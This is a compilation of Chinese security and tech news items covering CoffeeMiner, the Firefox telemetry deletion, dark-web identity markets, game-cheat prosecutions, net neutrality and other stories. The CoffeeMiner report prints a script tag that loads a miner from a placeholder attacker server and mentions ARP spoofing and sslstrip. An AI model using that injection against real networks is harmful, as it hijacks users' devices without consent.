据外媒 1 月 6 日报道，开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目，展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。 加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前，黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本，将其变成了自己的矿机疯狂挖掘门罗币（与比特币类似的一种加密货币）。 Arnau 专家受到了星巴克案件的启发，破解公共 Wi-Fi 网络，将加密挖掘代码注入到连接的浏览会话中，迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。 Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ，这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。 Arnau 专家分享 CoffeeMiner 攻击方式： 通过欺骗局域网上的地址解析协议（ARP）消息拦截网络上其他设备的未加密传输。 使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁，开发人员只注入了一行调用加密货币矿工的代码。 <script src="http://httpserverIP:8000/script.js" type="text/javascript"></script> 然后，通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时，运行 JavaScript 滥用 CPU 时间，并使用 CoinHive 加密挖掘软件挖掘 Monero 。 一旦编译完成，这些元素就会成为一个单独的脚本，可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由，导致其设备在浏览时挖掘加密货币。 目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS，但是可以通过添加 sslstrip 来绕过限制。 相关阅读： 研究人员发布的 CoffeeMiner 攻击演示视频  Arnau 在GitHub上发布的 CoffeeMiner 项目代码 消息来源：Security Affairs、Zdnet，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

因为 Firefox 崩溃报告工具发现了一个 bug，Mozilla 决定删除所有收集的遥测数据。自 Firefox 52 发布起 Mozilla 收集了后台标签页的崩溃报告，但崩溃报告工具的 bug 让浏览器没有遵守用户的隐私设置，它会自动递交崩溃报告，最近发布的 Firefox 57.0.3 修改了这个 bug。 因为崩溃报告不是匿名的，为了保护用户的隐私，Mozilla 决定删除这一期间所有收集的崩溃报告。这将导致它失去九个月的遥测数据。 稿源：cnBeta、solidot， 封面源自网络；

美国 ISP Armstrong 用限制恒温器访问来威胁盗版嫌疑人。Armstrong 致函客户，称它收到了多个侵权通知，督促用户停止盗版行为，否则它可能会降低用户的网速。这还不是最糟糕的，网络服务水平的降低还可能限制到用户对恒温器的远程访问。 这在冬天可能是很糟糕的事情。想想看你回到家中发现温度降到零下，而提高室温是需要很长一段时间的。Armstrong 称，受到指控的盗版嫌疑人如果要完全恢复服务需要回答版权相关的问题和观看相关的教育视频。 稿源：cnBeta、solidot，封面源自网络；

据外媒 12 月 26 日报道，知名安全调查员 Brian Krebs 发表博文称比特币作为地下网络犯罪中最常用的虚拟货币，其价格的飙升以及交易的相关费用可能会导致交易者将目光转向其他虚拟货币。 Krebs 称长期以来比特币的优势都在于其支付速度快、价格便宜、使用方便。在今年年初之前，比特币的收费还不到 0.10 美元。 而现在因为比特币价格的上涨以及支出的其他交易费用使得比特币在进行小额美元交易方面的吸引力大大降低，但这些交易占据了地下犯罪分子使用比特币支付交易的绝大部分。目前这种情形造成了数个主要的地下市场敦促其客户将资金存入其他的虚拟货币中，比如快捷、廉价的莱特币。 Krebs 引用了 Carder’s Paradise 的例子来进行解释。据悉，该商店也遭受了比特币价格上涨带来的困扰。 目前 Carder’s Paradise 的最低存款金额是 0.0066 BTC（大约USD $ 100），而每次交易的手续费为 15.14 美元，这意味着每当黑市的用户向该商店存入最低金额时，都会损失大约 15％ 的交易手续费。问题是， Carder’s Paradise 将所有存入的资金转给供应商时，这些供应商会收取额外的比特币交易费（与用户存款时相同的费用），甚至有时会遇到存入 1 美元多付 5 美元的情况，以至于 Carder’s Paradise 不得不从用户那收取在供应商处花费的交易费。为了补偿用户的成本，Carder’s Paradise 只有降低其价格（包括信用卡），并为用户提供更好的比特币汇率。 Krebs 解释说，交易费的金额取决于比特币网络上的负荷。但是，无论存款金额如何，交易费都保持不变，例如 10 $ 和 1 000 $ 的交易费是一样的。若比特币价格持续上涨，那么这个业务将就不会再为 Carder’s Paradise 赢利，因为所有的收入都将花在比特币的交易费上。 因此，Carder’s Paradise 希望用户尽可能多地使用 莱特币 。该商店负责人表示若用户储蓄的是莱特币， 他们不会收取任何额外费用。 针对该种情况，Krebs 在其博文中写道，虚拟货币在促进非法贸易方面发挥着至关重要的作用，其波动对犯罪生态系统产生的重大影响是很正常的。 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

从犯罪经历层面考量：除非你的信息特别有价值，否则没有黑客会专门针对个人发起攻击，尝试窃取你的身份信息。在棱镜监控丑闻以及频发的数据泄露事件影响下，普通网民认为身份窃取有着明确的个人倾向和影响，然而事实上这些黑客行为并不会针对个体发起攻击，而是形成了一套完整的商业牟利的方式。 外媒 TheNextWeb 的编辑 Emily Wilson 耗费数年对暗网、地下社区进行调研之后，总结了这些被窃取的信息（通常是个人信息）是如何被讨论、销售、评估和交易的。 在他第一次接触暗网并进行分析的时候，被暗网中所充斥的个人信息经济规模所震撼。在此之后，他经常能够接触到包含姓名、住址、电子邮件账号和密码的曝光信息。窃取身份的行为就像是穿着一个隐身斗篷，站在你的旁边看你在 ATM 机上取钱，只不过在网络上情况还要更糟糕。 那么什么是暗网？ 暗网是地下网络的总称，只有通过匿名方式才能访问。这些技术会掩盖用户的上网地址，并且很难找到暗网的主机托管地址。而且各种打击活动往往会导致暗网宕机下线，例如在今年夏天进行的执法行动中就打掉了名为 Alphabay 的大型暗网市场。 暗网事实上是在隐私保护基础建立的网络，主要保护用户和网站本身。同普通网民所持观点不同，大部分的暗网活动都是合法的。在 2016 年的调研报告中表示有超过 50% 的暗网网站本身是合法的，甚至于纽约时报就推出了一个暗网版本的网站。 自然，其中一部分暗网是由犯罪企业组建的。在这些暗网上供应商们会提供被偷窃的信用卡、用户数据、网站钓鱼教程或者新的漏洞套件。那些为合法用户提供保护的技术被平台用来保护非法物品和服务达成。 繁荣的犯罪经济 暗网经济充斥着骗局和不稳定性，但是搭建暗网平台却非常容易。首先管理员建立电子商务平台（类似于 eBay ），提供支付服务、审查功能和争议机制。一些市场还提供了丰富的货物和服务（例如可卡因毒品、流媒体视频账号、公共事业账单模板–基本上是一站式商城），而且还有一些特别的网站会专注于毒品或者网络欺诈。 供应商会提供丰富的产品类目，发布各种光鲜的广告，提供假日折扣，甚至大批量购买还有更多优惠。正如其他商业模式，想要从事网络欺诈的买家会寻找规模更大、有资历的供应商，目标是实现整个流程自动化，并最大限度的提高投资回报。这就意味着必须要确保购买精准的社会安全号码、信用卡数据和准确的密码等等。 犯罪分子并不会关心这些信息来自何处、隶属于谁，或者在清空银行账户之后会产生什么影响。他们只是希望从中牟取不法利益，并且最大化赚钱效率，因此他们的目标往往是最容易操作的数据类型。 那么什么样类型的数据最畅销？或者说需求最大？社会安全号码（ SSNs ，身份证信息）兼具价值和有用两大特性。 SSN 号码能够轻松访问其他账号，无论是更改密码还是其他操作。SSN 能够用于查找其他信息（姓名、出生日期、住址和联系方式）等，在按网上，一个 SSN 号码的售价只有数美元，不过在其中一组暗网上销售的儿童 SSN 号码（包含父母双方的）达到了 10 美元。 完整的身份包（暗网内叫做 fullz ）也是非常有价值和易于交易的。Fullz 通常包含姓名、出生日期、住址、社会安全号码、财务详情和其他相关个人信息。在暗网上一个身份包的出售价格在 5 – 25 美元之间，具体价格取决于信息价值。 网络欺诈无处不在 那么买家在拿到这些身份信息之后会怎么做？他们并不会特别针对某个个体发起诈骗，但你依然可能会成为受害者。任意时刻只要新的数据集进入到犯罪经济中，这些数据就会陷入使用和重复使用、销售和重复销售的循环中，直至过期。 部分信息的保质期有限（例如信用卡被取消或者因被窃而更改），但部分信息依然会持续数年、数十年甚至是永久。这也是为何之前 Equifax 的数据泄露事件会产生如此重大危害的原因，在事件中被曝光的并非只是支付卡信息，而是会跟随美国人一辈子的信息。 显然，这些信息是非常有价值的，而且难以改变。目前 Equifax 被窃取的数据并未在暗网上销售，但并不意味着就没有黑客会使用、交易这些数据。 那么作为普通网民现在能做什么？ 首先你必须要掌控基础安全。正如我（TNW 编辑）此前多次强调的，使用强密码并且在不同网站上使用不同密码（推荐使用密码管理器）。如果可行的话尽量使用双因素认证方式。 其次是提高对身份窃取的意识，将其视为整个行业输出链条的一个部分。对于犯罪分子来说，清空你的银行账号或者提交欺诈性的退税报告和普通白领办公没有差别。 稿源：cnBeta，封面源自网络；

近日，腾讯游戏安全中心宣布联合警方破获了网络游戏《绝地求生》的首起外挂软件制作、传播案件。腾讯方面表示，今年以来已协助警方破获了 30 多起外挂案件，抓获犯罪嫌疑人 120 余人。 警方破获首个《绝地求生》外挂案 此前国内已判决多个外挂制作、传播案 北京青年报记者查询过去 7 年间关于网络游戏外挂的判决书发现，网络游戏外挂层出不穷的一大原因是较低的门槛和巨大的利益。不少参与制作、销售外挂软件的人一年的非法获利可达数十万元甚至数百万元。一些犯罪分子甚至利用境外人士参与销售外挂软件，试图逃避打击。  “ 吃鸡 ” 用外挂  警方破获首案 12 月 22 日，腾讯游戏安全中心宣布联手江苏警方破获了旗下 “ 吃鸡 ” 网络游戏《绝地求生》的首起外挂软件制作、传播案件。 《 绝地求生 》是一款当红网络游戏，在平台上的同时在线人数一度突破 1700 万人。11 月 22 日，腾讯宣布获得了该款游戏的国内代理权，同时成立了专项小组调查该游戏的外挂制作及销售线索。 “ 在腾讯守护者计划安全团队的协助下，无锡江阴警方于 12 月 13 日成功抓捕并捣毁了 ‘ 望月 ’、‘ 神兵 ’ 等多个外挂制作及销售团伙，3 名核心涉案犯罪嫌疑人全部落网，并对犯罪事实供认不讳。” 腾讯游戏安全中心称，2017 年 1 月到 11 月，腾讯的相关人员协助警方破获了外挂案件 30 余起，抓获犯罪嫌疑人 120 余人。 所谓游戏的外挂，顾名思义是从外部控制住网络游戏程序的内容，从而令使用外挂的玩家获得升级加快、赚钱更多等功能的软件。对于不使用外挂的游戏玩家而言，使用外挂形成了不公平的竞争。对于游戏运营商而言，外挂引发的不公平可能引发玩游戏的人大幅减少，缩短了网络游戏的运营寿命。 早在 2003 年，当时的多部委在《关于开展对 “ 私服 ”、“ 外挂 ” 专项治理的通知》中明确指出 “ 外挂违法行为属于非法互联网出版活动，应依法予以严厉打击 ”。尽管如此，网络游戏中的外挂仍旧屡禁不绝。 通过植入广告  获利数百万元 北青报记者查阅了过去 7 年间关于网络游戏外挂案件的相关判决发现，早在 “ 偷菜 ” 类网游盛行的时候，便已经有人利用外挂软件牟取暴利了。  1991 年出生的邓建豪只有初中文化。2010 年 4 月份，邓建豪建立了 “ QQCEO ” 网站，并在该网站上传了 “ QQ农场牧场餐厅偷匪三合一 ” 等网络游戏外挂软件程序，供网民下载使用。 检察机关指控称，邓建豪与两家公司建立合作，将两家公司的广告编入外挂软件中，当网民使用外挂程序后便会自动弹出网页广告。邓建豪根据网民对网页广告的点击量向上述公司收取广告费。 邓建豪后来在法庭上供述，他开发的 “ QQ农场牧场餐厅偷匪三合一 ” 软件的运作原理是模拟鼠标点击，自动发模拟数据给服务器，使服务器误以为网民自己进行操作，达到 “ 种菜 ”、“ 偷菜 ”、“ 收菜 ” 等效果。 最终，当地法院认定邓建豪以营利为目的，非法经营额超 211 万元，判处其有期徒刑三年，并处罚金人民币 150 万元。 一名软件工程师告诉北青报记者，外挂软件的制作成本极低：“ 一方面，外挂软件只需要最基本的编程技术便可以制作出来，有些人通过自学就可以掌握相关的技术，门槛很低。另一方面，只需要有电脑就可以完成一个软件，其出售给玩家的电子复制过程几乎毫无成本，相比玩家给出的钱，其硬件成本也可谓微乎其微。” 在另一起案件中，陈伟与只有职高文化的肖海涛合作，由肖海涛制作了一款针对当时大热的网络游戏《征途 2》的外挂软件，并给这款外挂软件取名为 “ 推土机 ”。 利用这款外挂软件，玩家可以获得自动操作的功能，从而明显强于其他玩家。肖海涛开发出 “ 推土机 ” 后，由陈伟负责在网络上对外出售这款软件，两人对销售所得按约分成。 至 2014 年 6 月案发，半年多的时间里，陈伟已通过支付宝转给肖海涛超过 180 万元。 层层分包之后  下线仍能获利 北青报记者发现，在多起关于网络游戏外挂的案件中，犯罪分子建立了复杂的销售网络。 外挂的制作者往往并不负责销售，而是发展下线，下线销售者还会发展自己的下线，但地位越低的下线，其获得的利润越低，地位最高的销售者则坐拥暴利。 今年 9 月 4 日，江苏省盐城市中级法院二审审理了杨长春、王垒等人非法经营罪一案，此案中的被告人达 11 人。 判决书显示，2012 年 3 月至 2013 年 8 月，王垒通过一名网友获取了网络游戏《 地下城与勇士 》的外挂程序，并通过收取 “ 版权费 ” 及使用费的形式，向杨长春等人非法出售该游戏外挂程序计 1000 余个，非法经营额计 200 余万元，非法获利计 100 万元。 作为下线的杨长春又将约 799 个外挂程序转卖给陆维锋、王传珠、徐辉等人，非法经营额超过 425 万元，非法获利超 200 万元。 更低一层级的王传珠则将从杨长春处获得的 123 个外挂程序转卖给徐辉等人，非法经营额超 69 万元，非法获利超 5 万元。再低一层的下线徐辉将从杨长春、王传珠等人处获取的 88 个外挂程序转卖给程芝健等人，非法获利 2 万余元。 位于转包末梢的程芝健仍然有利可图，他把从徐辉等人处获取的 62 个外挂程序，非法出售后获利 16000 余元。 本案的判决书中坦言，虽然相比 7 个 G 大小的游戏软件，外挂软件的大小仅有 1 M 左右，但多名被告人非法经营非法出版物，扰乱市场秩序，分别达到 “ 情节特别严重 ” 或 “ 情节严重 ” 的标准，构成非法经营罪。 最终法院判决被告人杨长春犯非法经营罪，判处有期徒刑 6 年，并处罚金人民币 200 万元。其余被告人也都获得了相应的刑罚。 招揽境外人士  参与制作销售 相关判决书显示，一些用外挂软件牟利的犯罪分子为了规避法律打击，利用电子产品可以轻松跨越国境的特点，招收境外人士参与犯罪。  2013 年底，时为吉林省图们市质量监督局稽查分局工作人员的刘勇和咸某合谋，搭上当时由韩国引进的知名网络游戏《 剑灵 》的风，制作并出售《 剑灵 》游戏的外挂软件获取暴利。 刘勇在法庭上供称，咸某告诉他国外有人能做游戏外挂，觉得确实有利可图，就找人来做销售。 法院审理后确认，咸某找到了朝鲜人金某，由金某制作出一款针对《 剑灵 》的游戏外挂，命名为 “ ufo ” ，并安排崔某负责与金某联系该游戏外挂的技术维护等事项。 刘勇则找来了一位名叫桥上的日本人，安排其通过 QQ 在网上以招收代理的方式销售该游戏外挂，其中周卡每张销售价格为 25 元，月卡每张销售价格为 100 元。 刘勇后来供述称，之所以找到桥上负责销售，是因为知道销售外挂软件违法，认为 “ 找外国人安全一些 ”。 借助外挂销售，刘勇在 2013 年 11 月到 2014 年 5 月期间，累计收入 141 万余元，并向咸某支付了 68 万元。 最终法院以非法经营罪分别判处刘勇有期徒刑 5 年，并处罚金人民币 80 万元。 一位曾经使用过外挂的网络游戏玩家告诉北青报记者，玩家之所以使用外挂，一方面是因为玩游戏 “ 图个乐子 ”，希望能够获得战胜其他玩家的快感。另一方面是因为一些有钱的玩家会投入大量的金钱来获得更好的能力，对于钱不多的玩家来说，购买外挂是一种更加省钱又便捷的方式。 这位玩家表示，随着这些年网络游戏管理越来越严格，使用外挂的风险变得越来越大，“ 以前投入了很多钱的一个账号因为被发现使用外挂而被封号了。” 稿源：，稿件以及封面源自网络；

曾经，美国联邦通讯委员会 FCC 的官方网站上赫然写着网络中立三大原则——透明、无阻断、无歧视，但就大概就像中国古代县衙门前高高挂起的 “ 明镜高悬 ” 牌匾一样，在这里，人们未必可以找到公平和公正。今年年初，绰号“少年派”的 FCC 现任主席阿基特·帕伊（Ajit Pai）上任以后，一切都改变了。帕伊一再表态将推翻现行的“互联网开放规范”，上周，FCC 终于以 3：2 的表决结果推翻了前总统奥巴马时期的网络中立性政策。 这意味着，电信运营商有权进行区别性网络限速，给自己或是合作伙伴的内容服务提供优先流量待遇；可以实施 “ 付费优先 ” 政策，迫使互联网公司为自己的内容服务向运营商支付快速通道费用。对此，网络舆论一片哗然，甚至有人说 “ 互联网已死 ”。 尽管群情激奋，但回望美国历史，这早已不是如此拙劣的戏码第一次上演。可以说，网络中立立法博弈过程背后充斥着美国两党的斗争，近十年来，明枪暗箭、利益纠葛，光美国运营商和谷歌等互联网公司花在游说两党议员身上的金钱就高达数亿美金，网络中立政策每次翻案的背后，都逃不开赤裸裸的利益和政治交易。 2005 年至 2008 年间，有线网络仍是主流，汹涌而来的 BT 下载流量第一个令美国运营商 “ hold 不住 ” ，于是，在高峰拥堵时段，运营商开始对 BT 协议文件的传输采取“限流限速”。2008 年 8 月，FCC 决定对宽带运营商 Comcast 的上述行为进行处罚。 不过，对于 FCC 的大棒，Comcast 并不买账，并随即上诉到华盛顿哥伦比亚特区法院，结果，三位法官一致同意 FCC 对 Comcast 发出的处罚无效，随之而来的是业界舆论的一片哗然。 如果有任何当事人或厂商不服 FCC 的决定并希望通过司法上诉来扭转，唯一的选择就是联邦哥伦比亚特区巡回上诉法院（相当于我国高级人民法院的层级）。该法院的此次判决是美国司法首次对网络中立问题的表态。不过，值得玩味的是，法院判决 FCC 无该处罚权，并非对网络中立的否定，大法官的判罚依然有些 “ 暧昧 ” 。 美国《电信法》虽历经多次修法，但仍无针对网络中立的表述。所以，法官们摊开《电信法》一看，无解，随之选择 “ 逃避 ”。经历过华盛顿法庭的滑铁卢，2010 年 12 月 21 日，经过长达数月的激烈辩论后，FCC 终于第一次推动促成对网络中立的投票，促成美国首个的网络中立法律解释——《互联网开放令》。 在美国，FCC 是个独立行政机构，基本不受总统和其属下各内阁部门的约束，因此有时也被称为 “ 第四权 ” 。FCC 由五位委员组成，主席由总统从五位委员中提名一人担任，且同党籍委员不得超过 3 人。有趣的是，2010 年当时的投票结果恰恰与 2017 年相反，虽然同样是 3：2，但当时的三位民主党委员旗开得胜，而 2 位共和党委员则投了反对票。可见，美国在网络中立的博弈上，只有利益，不分对错，民主党的背后是互联网大佬，共和党的支持者则是电信运营商。政治风水轮流转，特朗普不会忘记上任前，谷歌、Facebook 等互联网公司对竞选对手希拉里的支持，不是不报，时候未到！ 那么，除了美国，全球其他国家如何执行网络中立呢？欧盟的电信《服务令》对网络中立有较明确的解释，欧洲运营商也相当本分，可能是投鼠忌器，不愿因小失大，只为了一点小利向互联网公司收费，却遭到政府调查。在全球网速最快国家的韩国，韩国政府曾做过一个调研，发现韩国运营商的 ARPU 值（每用户平均收入）在全球发达国家中排名靠后，于是出于保护国内产业的目的，韩国政府同意了韩国 KT、SK、LG 三家运营商的提价申请，即不执行网络中立。 在我国呢？ “ 提速降费 ” 可以看成我国对网络中立的一种表态，运营商需要为百姓生活、社会生产提供更便宜、更优质的通信和网络服务，从这个角度来看，也是我国运营商和互联网公司对网络中立的一种实践。 其实，网络中立性一直都在，目前互联网的繁荣就是建立在网络中立性原则基础之上的，任何一丝改变都将可能撬动创新的天平。 不过可以肯定的是，网络中立法不是救世主。 本文转载自 cnBeta、IT 时报，不代表 HackerNews.cc 观点。封面源自网络。

通常，我们了解手机信号的好坏借助的是状态栏的阶梯状图标。在 iOS 11 之前，苹果还曾用过点状，但现在因为刘海屏对顶栏空间的侵占，又改回去了。当然，在安卓手机上，借助三方工具或者很多个性化的 ROM，信号的展示也有了很多彩的形式。 不过，要更科学地查看信号强度或者在不同手机之间比较的话，最直观、准确的方式是看 dBm（1毫瓦的分贝数）和 asu（alone signal unit 独立信号单元）的数值。 安卓原生将这一数据放在 SIM 卡状态中，当然，一些国产 ROM 的入口会有所区别。还有一些颇有极客范的朋友，甚至借助 CM、MIUI 等系统，以 dbm 数值取代信号图标在状态栏展示。 由于各厂商在数值对应信号格子数的定义划分不同，dbm 可以视为一种更准确地横向比较手段。 然而，XDA Dev 报道称，AOSP（Android Open Source Project）最新版本的代码显示，谷歌将允许运营商今后隐藏掉信号强度数值。不过，这一调整没有从底层关掉 API，意味着三方 APP 仍可以获取，比如 Wi-Fi 分析仪、LTE Discovery 等。因为是最近才刚刚出现，XDA 倾向于认为这项特性会在明年的 Android P（安卓9.0）上启用，至于为什么突然这样做，还不得而知。 备注：一般而言，当 dbm>=-90，asu>=10 信号算比较正常的。 稿源：cnBeta、快科技，封面源自网络；

如同 18 世纪美国西部的淘金潮一样，加拿大的马尼托巴省（Manitoba）的小城温尼伯（Winnipeg）正在成为数字货币矿工向往的淘金圣地。近日，加拿大媒体 CBC 消息称，一大批来自全球各地的数字货币投资者将温尼伯视为开设矿场的最佳场所，他们拜访了当地的地产商、电力部门等机构。 在温尼伯拥有 2 万英亩低成本商业用地的 CentrePort 公司表示，很早就有亚洲、南美洲投资者觊觎这些土地，该公司负责人透露：“ 我们也遇到非亚洲的大型公司前来咨询，其中一些公司在北美已有很大的发展，正寻求大规模扩张。” 数字货币挖矿投资者为何向往温尼伯呢？原因有两大方面：当地电价非常便宜、年均气温偏低。 统计显示，在北美洲 20 个主要城市中，温尼伯电价最低，每千瓦时仅需约 0.05 加元（约 0.26 元人民币）。相比之下，纽约、多伦多等地每千瓦时电费都超过 0.14 加元，接近温尼伯电价的三倍。 数字货币挖矿往往需要消耗大量电能，以比特币为例，Digicomist 统计显示，截至今年 11 月 20 日，比特币 “ 挖矿 ” 一年耗费的电能达到 29.05 万亿瓦时，约占全球电能总消耗量的 0.13 %。这已经超过了全球 159 个国家和地区的电能消耗量，包括西欧的爱尔兰和拥有近 2 亿人口的尼日利亚。 电费也成为比特币生产过程中最主要的成本，且随着时间推移，“ 挖 ” 一枚比特币所需的电能在不断增加，伦敦 ETF 证券公司的研究和投资策略主管 James Butterfill 向彭博社表示，估计今年第四季度生产一枚比特币的成本为 6611 美元，到 2018 年第二季度将上升至每枚 14175 美元。 因此，温尼伯低廉的电费价格自然成为了吸引数字货币挖矿者的主要原因。 此外，由于矿机工作时发热严重，温尼伯偏低的气温很适合数字货币矿机散热。据统计，温尼伯年平均气温低于10摄氏度，与俄罗斯的莫斯科相当。 不过，由于数字货币挖矿需要消耗大量电能，温尼伯目前可以提供给挖矿者的适宜场所并不多。有当地数字货币领域知情者向 CBC 表示，如果算上潜在的挖矿耗电需求，温尼伯电力机构需要额外提供大约 1900 户当地家庭的用电量。 温尼伯电力机构还没有决定对电力设备升级，从而提供额外的电能供应，因为电力机构的官员们仍在怀疑数字货币兴起是不是一时的泡沫，提前升级设备可能太过草率。 稿源：cnBeta、全天候科技，封面源自网络；

美国国防部前雇员爱德华·斯诺登（ Edward Snowden ）因为披露美英的监视项目（ “ 棱镜门 ” ）而名声大噪，在互联网上，一些人将其视为 “ 安全斗士 ” 。斯诺登的最近一项动态和智能手机有关，他和团队（新闻基金会、守卫者项目）参与了一款安卓 APP 的开发，并已经上架 Play 商店，名为 Haven（避难所）。 Haven 目前的功能设计为调用摄像头、麦克风等一切手机传感器，对机主所处的环境进行识别感应。官方称，你可以将 Haven 安装在备用机上，然后当你离开家或者酒店的时候，这台备机就会通过光感、声音感应的等方式监测是否有人偷偷来过。这些视频、照片等 “ 证据 ” 还可以设定实时发送到主力机上，几乎就相当于一只 “ 看门狗 ”。当然，Haven 也可以装在主力机上，它内置加密信息应用 Signal，并且可以配合 Orbot 的暗网服务器使用，确保所有的数据往来都经过了本地加密。 Haven 刚上架 Play 商店 3 天，目前评分 4.5 分。 此前，斯诺登也曾就手机/笔记本安全分享自己的看法，比如建议只用耳机接电话、堵住笔记本的前置摄像头等。 稿源：cnBeta、快科技，封面源自网络；